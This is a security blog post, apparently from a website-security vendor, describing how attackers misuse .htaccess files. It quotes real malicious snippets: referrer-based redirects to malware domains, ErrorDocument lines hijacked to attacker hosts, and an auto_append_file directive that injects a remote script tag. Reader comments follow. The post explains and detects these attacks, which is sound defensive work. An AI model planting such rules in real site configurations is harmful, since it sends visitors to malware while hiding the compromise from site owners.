Understanding .htaccess attacks – Part 1

Attackers have been using the .htaccess file for a while. They use this file to hide malware, to redirect search engines to their own sites (think blackhat SEO), and for many other purposes (hide backdoors, inject content, to modify the php.ini values, etc).

Why do they use the .htaccess file? For multiple reasons. First, the .htaccess is a hidden file (starting with a “.”), so some site owners might not find them in their FTP clients. Secondly, it is a powerful file that allows you to make multiple changes to the web server and PHP behavior. This makes a .htaccess the attack hard to find and to clean up.

1- Redirecting users coming from search engines to malware

This is the most simple type of .htaccess attack, and the one we see more often. This is what gets added to the .htaccess file of a hacked site:

RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.* [OR]
RewriteCond %{HTTP_REFERER} .*ask.* [OR]
RewriteCond %{HTTP_REFERER} .*yahoo.* [OR]
RewriteCond %{HTTP_REFERER} .*baidu.* [OR]
RewriteCond %{HTTP_REFERER} .*linkedin.* [OR]
RewriteCond %{HTTP_REFERER} .*flickr.*
RewriteRule ^(.*)$ http://villusoftreit.ru/in.cgi?3 [R=301,L]

As you can see, it will check the referrer from anyone visiting the site and if the user came from a Google search (or yahoo or bing or any search engine), it will redirect the user to a page with malware (in this example http://villusoftreit.ru/in.cgi?3). Note that if you type the site directly in the address bar of your browser, nothing will happen. Why? It makes harder for the owner of the site to detect the attack, since they will probably type the site name, and not search for it on Google.

Below is another example of the same attack, but this time redirecting to http://globalpoweringgatheringon.com/in.php?n=30 (one of those Hilary kneber domains). Note that this time, they’v added hundreds of white spaces before the “RewriteCond” to make it harder to see in a text editor (We removed below to make easier to read in the post).

# BEGIN WordPress
RewriteEngine On
RewriteOptions inherit
RewriteCond %{HTTP_REFERER} .*ask.com.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*bing.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*live.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*excite.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*search.yahoo*$ [NC]
RewriteRule .* http://globalpoweringgatheringon.com/in.php?n=30 [R,L]


2 – Redirecting the error pages to malware

This is the second most common type of .htaccess malware. Instead of redirecting all traffic, the attackers are only modifying the error pages to their own domains (even harder to detect). This is what shows up in the .htaccess:

RewriteEngine On
ErrorDocument 400 http://powercrystal.ru/inject/index.php
ErrorDocument 401 http://powercrystal.ru/inject/index.php
ErrorDocument 403 http://powercrystal.ru/inject/index.php
ErrorDocument 404 http://powercrystal.ru/inject/index.php
ErrorDocument 500 http://powercrystal.ru/inject/index.php

Other examples:

ErrorDocument 400 http://arthurlundt.cz.cc/ht_er_docs/
ErrorDocument 403 http://arthurlundt.cz.cc/ht_er_docs/
ErrorDocument 404 http://arthurlundt.cz.cc/ht_er_docs/
ErrorDocument 405 http://arthurlundt.cz.cc/ht_er_docs/
ErrorDocument 404 http://bowdencanton.co.cc/ht_er_docs/
ErrorDocument 405 http://bowdencanton.co.cc/ht_er_docs/
ErrorDocument 406 http://bowdencanton.co.cc/ht_er_docs/
ErrorDocument 400 http://nicomagen.cz.cc/ht_er_docs/
ErrorDocument 403 http://nicomagen.cz.cc/ht_er_docs/
ErrorDocument 404 http://nicomagen.cz.cc/ht_er_docs/
ErrorDocument 405 http://nicomagen.cz.cc/ht_er_docs/


3 – Appending malware to a web site

This type of attack is getting more common lately. Instead of doing the redirection in the .htaccess file, they modify the PHP value “auto_append_file” to load malware from a hidden location. For example:

php_value auto_append_file “/tmp/13063671977873.php”

So the content of /tmp/13063671977873.php gets appended to every PHP file. This is what the PHP file looks like:

<script src="http://nicomagen.cz.cc/jquery.js"></script>

A common javascript malware. They sometimes even append fake images to make it even harder to detect.

In the next part of this article we will talk about additional .htaccess attacks and give you some tips to detect and analyze them.

Our scanner will detect any of those .htaccess attacks. You can try it out for free here: http://sitecheck.sucuri.net. If you have a hacked site, we can clean it up for you.

  1. The auto_prepend_file can be detected by our php code. If execute at the begin of the script the headers_sent function and this function return true, can understand that previously, some other script sent data to the browser.The auto_append_file, can be disabled from our code using at the end of all scripts the die() call, for example.

  2. My site was hacked by some Eastern Bloc or Russian entity. They put a folder in it called Biographies and that was full of links to their spammy pop-star web sites. Then they put redirects inside my htaccess file.

    The thing is, I ran the Free Site Check here and it did not discover anything and I thought my site was fine. I found out the next day it had been hacked for some time.

    Why didn’t the Free Site Check discover my hacked site? I was thinking of signing up for your service but this was not a good recommendation.

  3. Still waiting for Part 2.  I understand WHAT is affected, but I don’t understand how hackers get into the sites.  I desperately need to know this so I can prevent future attacks.

Comments are closed.

You May Also Like